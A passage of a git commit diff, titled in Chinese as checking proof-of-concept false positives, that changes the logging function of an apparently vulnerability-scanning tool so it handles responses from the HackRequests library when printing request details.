检查poc误报 diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 617dda5..bf12b95 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -48,10 +48,19 @@ def logging_3(self, vul_info, status_code, res): info_3 = self.logging_2(vul_info, status_code) try: - info_3 += color.red_ex(' [' + res.request.method + ' ') - info_3 +=color.black_ex(res.request.url) + color.red_ex(']') - if vul_info['data']: - info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']') + # * HackRequests + if (str(type(res)) == "